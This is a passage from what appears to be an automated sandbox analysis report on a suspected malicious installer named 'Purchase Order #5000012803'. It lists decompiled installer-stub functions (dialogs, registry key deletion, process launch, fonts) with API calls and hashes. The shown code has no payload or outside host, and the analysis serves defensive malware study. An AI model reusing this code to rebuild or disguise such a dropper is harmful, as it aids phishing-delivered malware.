                      				if(_t6 >  *0x423eac) {
                      					__eflags =  *0x423ea8;
                      					if( *0x423ea8 == 0) {
                      						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
                      						 *0x417044 = _t7;
                      						return _t7;
                      					}
                      					__eflags =  *0x423f54 & 0x00000001;
                      					if(( *0x423f54 & 0x00000001) != 0) {
                      						wsprintfA( &_v68, "... %d%%", E00402BA9());
                      						return E00404E23(0,  &_v68);
                      					}
                      				}
                      				return _t6;
                      			}








                      APIs
                      • DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
                      • GetTickCount.KERNEL32 ref: 00402BFB
                      • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                        • Part of subcall function 00402BA9: MulDiv.KERNEL32(000310F2,00000064,00032ABC), ref: 00402BBE
                      • wsprintfA.USER32 ref: 00402C29
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                        • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                        • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                      • String ID: ... %d%%
                      • API String ID: 632923820-2449383134
                      • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                      • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                      • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                      • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 84%
                      			E00402A28(void* _a4, char* _a8, intOrPtr _a12) {
                      				void* _v8;
                      				char _v272;
                      				long _t18;
                      				intOrPtr* _t27;
                      				long _t28;
                      
                      				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
                      				if(_t18 == 0) {
                      					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                      						if(_a12 != 0) {
                      							RegCloseKey(_v8);
                      							L8:
                      							return 1;
                      						}
                      						if(E00402A28(_v8,  &_v272, 0) != 0) {
                      							break;
                      						}
                      					}
                      					RegCloseKey(_v8);
                      					_t27 = E00405DA3(2);
                      					if(_t27 == 0) {
                      						if( *0x423f50 != 0) {
                      							goto L8;
                      						}
                      						_t28 = RegDeleteKeyA(_a4, _a8);
                      						if(_t28 != 0) {
                      							goto L8;
                      						}
                      						return _t28;
                      					}
                      					return  *_t27(_a4, _a8,  *0x423f50, 0);
                      				}
                      				return _t18;
                      			}









                      APIs
                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A49
                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                      • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                      • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Close$DeleteEnumOpen
                      • String ID:
                      • API String ID: 1912718029-0
                      • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                      • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                      • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                      • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00401CC1(int __edx) {
                      				void* _t17;
                      				struct HINSTANCE__* _t21;
                      				struct HWND__* _t25;
                      				void* _t27;
                      
                      				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                      				GetClientRect(_t25, _t27 - 0x40);
                      				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                      				if(_t17 != _t21) {
                      					DeleteObject(_t17);
                      				}
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
                      				return 0;
                      			}








                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                      • String ID:
                      • API String ID: 1849352358-0
                      • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                      • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                      • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                      • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 51%
                      			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
                      				char _v36;
                      				char _v68;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* _t26;
                      				void* _t34;
                      				signed int _t36;
                      				signed int _t39;
                      				unsigned int _t46;
                      
                      				_t46 = _a12;
                      				_push(0x14);
                      				_pop(0);
                      				_t34 = 0xffffffdc;
                      				if(_t46 < 0x100000) {
                      					_push(0xa);
                      					_pop(0);
                      					_t34 = 0xffffffdd;
                      				}
                      				if(_t46 < 0x400) {
                      					_t34 = 0xffffffde;
                      				}
                      				if(_t46 < 0xffff3333) {
                      					_t39 = 0x14;
                      					asm("cdq");
                      					_t46 = _t46 + 1 / _t39;
                      				}
                      				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
                      				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
                      				_t21 = _t46 & 0x00ffffff;
                      				_t36 = 0xa;
                      				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                      				_push(_t46 >> 0);
                      				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
                      				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
                      				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
                      			}














                      APIs
                      • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                      • wsprintfA.USER32 ref: 004046A6
                      • SetDlgItemTextA.USER32 ref: 004046B9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: ItemTextlstrlenwsprintf
                      • String ID: %u.%u%s%s
                      • API String ID: 3540041739-3551169577
                      • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                      • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                      • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                      • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 51%
                      			E00401BAD() {
                      				signed int _t28;
                      				CHAR* _t31;
                      				long _t32;
                      				int _t37;
                      				signed int _t38;
                      				int _t42;
                      				int _t48;
                      				struct HWND__* _t52;
                      				void* _t55;
                      
                      				 *(_t55 - 0x34) = E004029CB(3);
                      				 *(_t55 + 8) = E004029CB(4);
                      				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                      					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
                      				}
                      				__eflags =  *(_t55 - 0x10) & 0x00000002;
                      				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                      					 *(_t55 + 8) = E004029E8(0x44);
                      				}
                      				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                      				_push(1);
                      				if(__eflags != 0) {
                      					_t50 = E004029E8();
                      					_t28 = E004029E8();
                      					asm("sbb ecx, ecx");
                      					asm("sbb eax, eax");
                      					_t31 =  ~( *_t27) & _t50;
                      					__eflags = _t31;
                      					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                      					goto L10;
                      				} else {
                      					_t52 = E004029CB();
                      					_t37 = E004029CB();
                      					_t48 =  *(_t55 - 0x10) >> 2;
                      					if(__eflags == 0) {
                      						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                      						L10:
                      						 *(_t55 - 8) = _t32;
                      					} else {
                      						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                      						asm("sbb eax, eax");
                      						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                      					}
                      				}
                      				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                      				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                      					_push( *(_t55 - 8));
                      					E004059E3();
                      				}
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
                      				return 0;
                      			}













                      APIs
                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                      • SendMessageA.USER32 ref: 00401C25
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend$Timeout
                      • String ID: !
                      • API String ID: 1777923405-2657877971
                      • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                      • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                      • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                      • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004052E5(CHAR* _a4) {
                      				struct _PROCESS_INFORMATION _v20;
                      				int _t7;
                      
                      				0x4224a0->cb = 0x44;
                      				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
                      				if(_t7 != 0) {
                      					CloseHandle(_v20.hThread);
                      					return _v20.hProcess;
                      				}
                      				return _t7;
                      			}






                      APIs
                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                      • CloseHandle.KERNEL32(?), ref: 00405317
                      Strings
                      • Error launching installer, xrefs: 004052F8
                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: CloseCreateHandleProcess
                      • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                      • API String ID: 3712363035-1785902839
                      • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                      • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                      • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                      • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00405578(CHAR* _a4) {
                      				CHAR* _t7;
                      
                      				_t7 = _a4;
                      				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                      					lstrcatA(_t7, 0x40900c);
                      				}
                      				return _t7;
                      			}





                      APIs
                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
                      • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                      Strings
                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: CharPrevlstrcatlstrlen
                      • String ID: C:\Users\user\AppData\Local\Temp\
                      • API String ID: 2659869361-3081826266
                      • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                      • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                      • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                      • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E00401EC5(char __ebx, char* __edi, char* __esi) {
                      				char* _t18;
                      				int _t19;
                      				void* _t30;
                      
                      				_t18 = E004029E8(0xffffffee);
                      				 *(_t30 - 0x2c) = _t18;
                      				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                      				 *__esi = __ebx;
                      				 *(_t30 - 8) = _t19;
                      				 *__edi = __ebx;
                      				 *((intOrPtr*)(_t30 - 4)) = 1;
                      				if(_t19 != __ebx) {
                      					__eax = GlobalAlloc(0x40, __eax);
                      					 *(__ebp + 8) = __eax;
                      					if(__eax != __ebx) {
                      						if(__eax != 0) {
                      							__ebp - 0x44 = __ebp - 0x34;
                      							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
                      								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                      								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                      								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                      							}
                      						}
                      						_push( *(__ebp + 8));
                      						GlobalFree();
                      					}
                      				}
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                      				return 0;
                      			}







                      APIs
                      • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                      • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                      • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                        • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                      • String ID:
                      • API String ID: 1404258612-0
                      • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                      • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
                      • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                      • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 67%
                      			E00401D1B() {
                      				void* __esi;
                      				int _t6;
                      				signed char _t11;
                      				struct HFONT__* _t14;
                      				void* _t18;
                      				void* _t24;
                      				void* _t26;
                      				void* _t28;
                      
                      				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                      				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
                      				 *0x40af7c = E004029CB(3);
                      				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                      				 *0x40af83 = 1;
                      				 *0x40af80 = _t11 & 0x00000001;
                      				 *0x40af81 = _t11 & 0x00000002;
                      				 *0x40af82 = _t11 & 0x00000004;
                      				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
                      				_t14 = CreateFontIndirectA(0x40af6c);
                      				_push(_t14);
                      				_push(_t26);
                      				E004059E3();
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
                      				return 0;
                      			}












                      APIs
                      • GetDC.USER32(?), ref: 00401D22
                      • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                      • CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: CapsCreateDeviceFontIndirect
                      • String ID:
                      • API String ID: 3272661963-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403897(void* __ecx, void* __eflags) {
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed short _t6;
                      				intOrPtr _t11;
                      				signed int _t13;
                      				signed int _t16;
                      				signed short* _t18;
                      				signed int _t20;
                      				signed short* _t23;
                      				intOrPtr _t25;
                      				signed int _t26;
                      				intOrPtr* _t27;
                      
                      				_t24 = "1033";
                      				_t13 = 0xffff;
                      				_t6 = E004059FC(__ecx, "1033");
                      				while(1) {
                      					_t26 =  *0x423ee4;
                      					if(_t26 == 0) {
                      						goto L7;
                      					}
                      					_t16 =  *( *0x423eb0 + 0x64);
                      					_t20 =  ~_t16;
                      					_t18 = _t16 * _t26 +  *0x423ee0;
                      					while(1) {
                      						_t18 = _t18 + _t20;
                      						_t26 = _t26 - 1;
                      						if((( *_t18 ^ _t6) & _t13) == 0) {
                      							break;
                      						}
                      						if(_t26 != 0) {
                      							continue;
                      						}
                      						goto L7;
                      					}
                      					 *0x423680 = _t18[1];
                      					 *0x423f48 = _t18[3];
                      					_t23 =  &(_t18[5]);
                      					if(_t23 != 0) {
                      						 *0x42367c = _t23;
                      						E004059E3(_t24,  *_t18 & 0x0000ffff);
                      						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
                      						_t11 =  *0x423ecc;
                      						_t27 =  *0x423ec8;
                      						if(_t11 == 0) {
                      							L15:
                      							return _t11;
                      						}
                      						_t25 = _t11;
                      						do {
                      							_t11 =  *_t27;
                      							if(_t11 != 0) {
                      								_t11 = E00405AA7(_t13, _t25, _t27, _t27 + 0x18, _t11);
                      							}
                      							_t27 = _t27 + 0x418;
                      							_t25 = _t25 - 1;
                      						} while (_t25 != 0);
                      						goto L15;
                      					}
                      					L7:
                      					if(_t13 != 0xffff) {
                      						_t13 = 0;
                      					} else {
                      						_t13 = 0x3ff;
                      					}
                      				}
                      			}

















                      APIs
                      • SetWindowTextA.USER32(00000000,004236A0), ref: 0040392F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: TextWindow
                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                      • API String ID: 530164218-517883005
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                      				long _t22;
                      
                      				if(_a8 != 0x102) {
                      					if(_a8 != 0x200) {
                      						_t22 = _a16;
                      						L7:
                      						if(_a8 == 0x419 &&  *0x420480 != _t22) {
                      							 *0x420480 = _t22;
                      							E00405A85(0x420498, 0x424000);
                      							E004059E3(0x424000, _t22);
                      							E0040140B(6);
                      							E00405A85(0x424000, 0x420498);
                      						}
                      						L11:
                      						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
                      					}
                      					if(IsWindowVisible(_a4) == 0) {
                      						L10:
                      						_t22 = _a16;
                      						goto L11;
                      					}
                      					_t22 = E004046F2(_a4, 1);
                      					_a8 = 0x419;
                      					goto L7;
                      				}
                      				if(_a12 != 0x20) {
                      					goto L10;
                      				}
                      				E00403E83(0x413);
                      				return 0;
                      			}





                      APIs
                      • IsWindowVisible.USER32(?), ref: 00404DA9
                      • CallWindowProcA.USER32 ref: 00404E17
                        • Part of subcall function 00403E83: SendMessageA.USER32 ref: 00403E95
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Window$CallMessageProcSendVisible
                      • String ID:
                      • API String ID: 3748168415-3916222277
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                      				int _t5;
                      				long _t7;
                      				struct _OVERLAPPED* _t11;
                      				intOrPtr* _t15;
                      				void* _t17;
                      				int _t21;
                      
                      				_t15 = __esi;
                      				_t11 = __ebx;
                      				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                      					_t7 = lstrlenA(E004029E8(0x11));
                      				} else {
                      					E004029CB(1);
                      					 *0x409f68 = __al;
                      				}
